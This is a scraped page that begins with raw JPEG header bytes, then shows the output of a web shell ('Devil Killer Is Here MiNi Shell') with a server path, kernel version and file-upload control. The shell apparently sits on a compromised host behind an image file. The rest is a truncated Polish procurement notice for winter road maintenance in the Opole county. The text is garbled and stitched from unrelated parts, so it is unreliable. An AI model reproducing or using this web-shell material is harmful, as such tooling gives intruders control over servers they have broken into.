JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240912/0049769901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie w sezonie zima 2024/2025 usług związanych z zimowym utrzymaniem dróg powiatowych administrowanych przez Zarząd Dróg Powiatowych w Opolu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Opolski -Zarząd Dróg Powiatowych w Opolu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531421584</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Książąt Opolskich 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-005</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zdp.opole.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zdp.opole.pl/291/strona-glowna.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami powiatowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie w sezonie zima 2024/2025 usług związanych z zimowym utrzymaniem dróg powiatowych administrowanych przez Zarząd Dróg Powiatowych w Opolu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63366c43-3cc3-4769-ac61-f8a0f6811244</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00497699</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00007497/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.5 Wykonanie w sezonie zima 2024/2025 usług związanych z zimowym utrzymaniem dróg powiatowych administrowanych przez Zarząd Dróg Powiatowych w Opolu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-63366c43-3cc3-4769-ac61-f8a0f6811244 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia@zdp.opole.pl (nie dotyczy składania ofert w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">szczegółowo opisane w pkt. 12 SWZ - Tom I Instrukcja Dla Wykonawców, znajdującej się na stronie: https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-63366c43-3cc3-4769-ac61-f8a0f6811244</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest ZDP w Opolu przy ul. Ks. Opolskich<br/>27, 45–005 Opole, tel. 0774414069, zwany dalej Administratorem, email: sekretariat@zdp.opole.pl. IODO: iod@zdp.opole.pl;<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek<br/>prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym; 3. Odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.<br/>18 oraz art. 74 ustawy Pzp;<br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia;<br/>5. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>7. Posiada Pan/Pani:<br/>−na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z<br/>prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego<br/>załączników;<br/>−prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń o których mowa w art. 14 ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych na podstawie art. 18 RODO z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego, a tak że nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia. Nie przysługuje Pani/Panu:<br/>−w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AO.261.1.15.2024.EW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie w sezonie zimowym 2024/2025 usług związanych z zimowym utrzymaniem dróg powiatowych administrowanych przez ZDP Opole - na terenie gmin Łubniany, Murów, Turawa - ( O.D. Kotórz Mały ). <br/>1.	Opis i zakres zamówienia:<br/>Zamówienie obejmuje usługi w zakresie zimowego utrzymania dróg powiatowych przy odśnieżaniu i usuwaniu śliskości na terenie gmin Łubniany, Murów, Turawa (Obwód Drogowy w Kotorzu Małym). Szczegółowy opis, zakres i warunki wykonywania usług zawierają załączniki:<br/>a)	„Wykaz dróg powiatowych objętych i nie objętych zimowym utrzymaniem w sezonie 2024/2025” – poz. 6-32 oraz 48-59 w OD nr 2 Kotórz Mały,<br/>b) Specyfikacje Techniczne (ST).<br/>2. Informacje dodatkowe dot. zamówienia:<br/> 2.1. Zarząd Dróg Powiatowych w Opolu zapewnia:<br/>a) materiały uszorstniające z załadunkiem na placu składowym w Opolu-Bierkowicach<br/> (miejsce podstawienia sprzętu do załadunku),<br/>b)	dyżur osobowy (dyżurny AZ).<br/>2.2. Wykonawca zapewni zaplecze sprzętowo-warsztatowe (obsługę warsztatową jednostek sprzętowych umożliwiającą szybkie reagowanie i utrzymywanie sprzętu w stałej sprawności technicznej). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2025-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/><br/>Dopuszcza się możliwość udzielenia w okresie 3 lat (wybranemu w niniejszym postępowaniu wykonawcy usług podstawowych) zamówień podobnych, polegających na powtórzeniu tego samego rodzaju usług jakie obejmuje niniejsze postępowanie <br/>(do 50 % wartości szacowanej usług podstawowych) – w przypadku zaistnienia potrzeby zwiększenia zakresu przedmiotowych usług i posiadania środków na ich sfinansowanie – dotyczy osobno każdej z części.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>a)	kryterium „cena oferty” (C) – waga kryterium - 60%<br/>b)	kryterium „termin podjęcia usługi” (T) – waga kryterium - 40%<br/><br/>1.1.	Kryterium „cena oferty” (C) - waga 60 %<br/>Kryterium „cena oferty” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Ofercie. Ilość punktów w tym kryterium zostanie obliczona na podstawie wzoru C = Cmin / Co x 100 pkt, gdzie:<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „cena oferty”,<br/>Cmin – cena brutto oferty najtańszej,<br/>Co – cena brutto oferty ocenianej.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 100 pkt.<br/>1.2.	Kryterium „termin podjęcia usługi” (T) ( od momentu zawiadomienia Wykonawcy przez Zamawiającego o potrzebie usługi ) – waga 40 %<br/> Kryterium „termin podjęcia usługi (T)” oceniane będzie na podstawie czasu podjęcia usługi od momentu zawiadomienia przez Zamawiającego o potrzebie usługi, wskazanego w godzinach i minutach – zadeklarowanego przez Wykonawcę w pkt. 2.1 lit. b, 2.2 lit. b lub 2.3 lit. b Formularza Oferty (w zależności od części na którą składana jest oferta). Zamawiający w kryterium „termin podjęcia usługi” będzie przyznawał punkty, <br/> następująco:<br/><br/> 1. deklarowanie podjęcia usługi w ciągu 0,5 godz - 100 pkt <br/> 2. deklarowanie podjęcia usługi w ciągu 1,0 godz - 0 pkt <br/><br/>UWAGA! <br/>Wykonawca może zaproponować czas podjęcia usługi jedynie 0,5 godz. lub najdłuższy czas 1,0 godzina od zawiadomienia przez zamawiającego o potrzebie wykonania usługi.<br/><br/>Jeżeli Wykonawca zaproponuje termin podjęcia usługi w czasie krótszym niż 0,5 godziny to do oceny takiej oferty zostanie przyjęty czas 0,5 godz. i taki termin podjęcia usługi zostanie uwzględniony w Umowie z Wykonawcą. <br/>	<br/> Oferty, w których:<br/>- nie zostanie zaoferowany termin podjęcia usługi ( nie zostanie podany czas w druku oferty) <br/> lub <br/>- będzie on dłuższy niż 1,0 h ( 60 min. ) <br/><br/> zostaną odrzucone na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp.<br/> <br/> Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 100 pkt.<br/>2.	Zamawiający uzna za najkorzystniejszą ofertę Wykonawcy, który spełni warunki udziału w postępowaniu, a jego oferta nie będzie podlegać odrzuceniu oraz otrzyma największą liczbę punków wyliczoną zgodnie ze wzorem <br/>∑o = Co* 0,60 + To* 0,40, gdzie:<br/> ∑o – łączna ilość punktów dla ocenianej oferty,<br/>Co – liczba punktów przyznana ofercie ocenianej w kryterium „cena oferty”,<br/>To – liczba punktów przyznana ofercie ocenianej w kryterium „termin podjęcia usługi”.<br/>3.	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera pośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>4. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>5. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt. 19.4. zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>6. Jeżeli w przypadku o którym mowa w pkt. 19.5 zostały złożone oferty dodatkowe <br/>o takiej samej cenie zamawiający unieważnia postępowanie zgodnie z art. 255 <br/>pkt 4 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin podjęcia usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie w sezonie zimowym 2024/2025 usług związanych z zimowym utrzymaniem dróg powiatowych administrowanych przez ZDP Opole - na terenie gmin Dąbrowa, Komprachcice, Prószków - ( O.D. Dąbrowa ).<br/>1. Opis i zakres zamówienia:<br/>Zamówienie obejmuje usługi w zakresie zimowego utrzymania dróg powiatowych przy odśnieżaniu i usuwaniu śliskości na terenie gmin Dąbrowa, Komprachcice, Prószków (Obwód Drogowy w Dąbrowie). Szczegółowy opis, zakres i warunki wykonywania usług zawierają załączniki:<br/>a) „Wykaz dróg powiatowych objętych i nie objętych zimowym utrzymaniem w sezonie <br/> 2024/2025” - poz. 1-14 oraz 31-33 w OD nr 1 Dąbrowa,<br/>b) Specyfikacje Techniczne (ST).<br/>2. Informacje dodatkowe dot. zamówienia:<br/>2.1. Zarząd Dróg Powiatowych w Opolu zapewnia:<br/>a)	materiały uszorstniające z załadunkiem na placu składowym w Opolu-Bierkowicach<br/> (miejsce podstawienia sprzętu do załadunku),<br/>b)	dyżur osobowy (dyżurny AZ).<br/>2.2. Wykonawca zapewni:<br/>a) zaplecze sprzętowo-warsztatowe (obsługę warsztatową jednostek sprzętowych umożliwiającą szybkie reagowanie i utrzymywanie sprzętu w stałej sprawności technicznej). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2025-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/><br/>Dopuszcza się możliwość udzielenia w okresie 3 lat (wybranemu w niniejszym postępowaniu wykonawcy usług podstawowych) zamówień podobnych, polegających na powtórzeniu tego samego rodzaju usług jakie obejmuje niniejsze postępowanie <br/>(do 50 % wartości szacowanej usług podstawowych) – w przypadku zaistnienia potrzeby zwiększenia zakresu przedmiotowych usług i posiadania środków na ich sfinansowanie – dotyczy osobno każdej z części.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert:<br/>a)	kryterium „cena oferty” (C) – waga kryterium - 60%<br/>b)	kryterium „termin podjęcia usługi” (T) – waga kryterium - 40%<br/><br/>1.1.	Kryterium „cena oferty” (C) - waga 60 %<br/>Kryterium „cena oferty” będzie rozpatrywana na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w Ofercie. Ilość punktów w tym kryterium zostanie obliczona na podstawie wzoru C = Cmin / Co x 100 pkt, gdzie:<br/>C – liczba punktów przyznana ofercie ocenianej w kryterium „cena oferty”,<br/>Cmin – cena brutto oferty najtańszej,<br/>Co – cena brutto oferty ocenianej.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksimum 100 pkt.<br/>1.2.	Kryterium „termin podjęcia usługi” (T) ( od momentu zawiadomienia Wykonawcy przez Zamawiającego o potrzebie usługi ) – waga 40 %<br/> Kryterium „termin podjęcia usługi (T)” oceniane będzie na podstawie czasu podjęcia usługi od momentu zawiadomienia przez Zamawiającego o potrzebie usługi, wskazanego w godzinach i minutach – zadeklarowanego przez Wykonawcę w pkt. 2.1 lit. b, 2.2 lit. b lub 2.3 lit. b Formularza Oferty (w zależności od części na którą składana jest oferta). Zamawiający w kryterium „termin podjęcia usługi” będzie przyznawał punkty, <br/> następująco:<br/><br/> 1. deklarowanie podjęcia usługi w ciągu 0,5 godz - 100 pkt <br/> 2. deklarowanie podjęcia usługi w ciągu 1,0 godz - 0 pkt <br/><br/>UWAGA! <br/>Wykonawca może zaproponować czas podjęcia usługi jedynie 0,5 godz. lub najdłuższy czas 1,0 godzina od zawiadomienia przez zamawiającego o potrzebie wykonania usługi.<br/><br/>Jeżeli Wykonawca zaproponuje termin podjęcia usługi w czasie krótszym niż 0,5 godziny to do oceny takiej oferty zostanie przyjęty czas 0,5 godz. i taki termin podjęcia usługi zostanie uwzględniony w Umowie z Wykonawcą. <br/>	<br/> Oferty, w 